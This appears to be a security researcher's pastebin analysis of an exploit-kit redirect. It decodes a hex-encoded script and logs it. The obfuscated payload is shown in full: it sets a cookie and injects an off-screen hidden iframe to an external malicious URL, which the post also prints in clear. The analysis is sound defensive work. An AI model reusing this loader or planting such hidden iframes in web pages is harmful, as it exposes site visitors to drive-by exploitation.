Analysis Code for Malicious Exploit Kit Redirect

1. Analysis Code for Malicious Exploit Kit Redirect
2. *******
3. <html>
4. <body>
5. <script>
6. var didinsik = "";
7. var ydyyneah = "77696e646f772e6f6e6c6f6164203d2066756e6374696f6e28297b66756e6374696f6e20783232627128612c622c63297b69662863297b7661722064203d206e6577204461746528293b642e7365744461746528642e6765744461746528292b63293b7d6966286120262620622920646f63756d656e742e636f6f6b6965203d20612b273d272b622b2863203f20273b20657870697265733d272b642e746f555443537472696e672829203a202727293b656c73652072657475726e2066616c73653b7d66756e6374696f6e2078333362712861297b7661722062203d206e65772052656745787028612b273d285b5e3b5d297b312c7d27293b7661722063203d20622e6578656328646f63756d656e742e636f6f6b6965293b69662863292063203d20635b305d2e73706c697428273d27293b656c73652072657475726e2066616c73653b72657475726e20635b315d203f20635b315d203a2066616c73653b7d766172207833336471203d2078333362712822633634323536343937363538396637353661646139393631353766323339346522293b69662820783333647120213d2022383265653362616135613261343133363662386339613433623837633363353922297b783232627128226336343235363439373635383966373536616461393936313537663233393465222c223832656533626161356132613431333636623863396134336238376333633539222c31293b766172207832326471203d20646f63756d656e742e637265617465456c656d656e74282264697622293b766172207832327171203d2022687474703a2f2f63646e2e6f67726f6d6e7565736f736f63686b692e696e666f2f6d656761616476657274697a652f3f666447647866653d764f746648594c505a6f715555684226526443696b417755663d427976474f615350514555586766266b6579776f72643d653062623131343238343066353331343439353332383661646261643435363026506464674e7a59716d635171653d6851647a6d7a652657674472547164774452693d744f6a4c716a614652572643654c6a7872444e683d69416357494958426c74505a7a546b264558504e7863725748656567436176683d5044427a4a744d444b636871266249485864536b566e6d6b4f4842633d6370714f7a6d5a6d474156755943223b78323264712e696e6e657248544d4c3d223c646976207374796c653d27706f736974696f6e3a6162736f6c7574653b7a2d696e6465783a313030303b746f703a2d3130303070783b6c6566743a2d3939393970783b273e3c696672616d65207372633d27222b78323271712b22273e3c2f696672616d653e3c2f6469763e223b646f63756d656e742e626f64792e617070656e644368696c64287832326471293b7d7d";
8. for (var fnbstitk = 0; fnbstitk < ydyyneah.length; fnbstitk += 2) {
9.     didinsik = didinsik + parseInt(ydyyneah.substring(fnbstitk, fnbstitk + 2), 16) + ",";
10. }
11. didinsik = didinsik.substring(0, didinsik.length - 1);
12. console.log(didinsik);
13. var x = eval('String.fromCharCode(' + didinsik + ');');
14. console.log(x);
15.  
16.    function x22bq(a, b, c) {
17.            var d = new Date();
18.            d.setDate(d.getDate() + c);
19.        console.log(a + '=' + b + (c ? '; expires=' + d.toUTCString() : ''));
20.     }
21.        x22bq("c642564976589f756ada996157f2394e", "82ee3baa5a2a41366b8c9a43b87c3c59", 1);
22.        var x22qq = "http://cdn.ogromnuesosochki.info/megaadvertize/?fdGdxfe=vOtfHYLPZoqUUhB&RdCikAwUf=ByvGOaSPQEUXgf&keyword=e0bb1142840f53144953286adbad4560&PddgNzYqmcQqe=hQdzmze&WgDrTqdwDRi=tOjLqjaFRW&CeLjxrDNh=iAcWIIXBltPZzTk&EXPNxcrWHeegCavh=PDBzJtMDKchq&bIHXdSkVnmkOHBc=cpqOzmZmGAVuYC";
23.        console.log('<div style=position:absolute;z-index:1000;top:-1000px;left:-9999px;><iframe src=' + x22qq + '></iframe></div>');
24. </script>
25. </body>
26. </html>
27.  
28.  
29.  
30. *******
31. *******
32. *******
33. More FROM @neonprimetime security
34.  
35. http://pastebin.com/u/Neonprimetime
36. https://www.virustotal.com/en/USER/neonprimetime/
37. https://twitter.com/neonprimetime
38. https://www.reddit.com/USER/neonprimetime